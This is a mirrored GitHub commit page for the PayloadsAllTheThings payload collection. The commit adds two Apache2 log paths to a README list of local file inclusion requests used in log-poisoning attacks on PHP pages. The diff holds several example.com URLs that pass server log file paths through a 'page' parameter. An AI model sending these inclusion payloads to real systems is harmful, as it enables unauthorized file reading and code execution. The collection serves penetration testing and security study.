mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-07 09:23:55 +01:00
Update README.md
I met with /var/log/apache2/ more often than /var/log/apache/ and i believe if someone is following this list, the apache2 items will make a difference. Cheers !
This commit is contained in:
parent
5b1a79cb56
commit
d317b46af9
1 changed files with 2 additions and 0 deletions
|
|
@ -289,6 +289,8 @@ Just append your PHP code into the log file by doing a request to the service (A
|
||||||
```powershell
|
```powershell
|
||||||
http://example.com/index.php?page=/var/log/apache/access.log
|
http://example.com/index.php?page=/var/log/apache/access.log
|
||||||
http://example.com/index.php?page=/var/log/apache/error.log
|
http://example.com/index.php?page=/var/log/apache/error.log
|
||||||
|
http://example.com/index.php?page=/var/log/apache2/access.log
|
||||||
|
http://example.com/index.php?page=/var/log/apache2/error.log
|
||||||
http://example.com/index.php?page=/var/log/nginx/access.log
|
http://example.com/index.php?page=/var/log/nginx/access.log
|
||||||
http://example.com/index.php?page=/var/log/nginx/error.log
|
http://example.com/index.php?page=/var/log/nginx/error.log
|
||||||
http://example.com/index.php?page=/var/log/vsftpd.log
|
http://example.com/index.php?page=/var/log/vsftpd.log
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue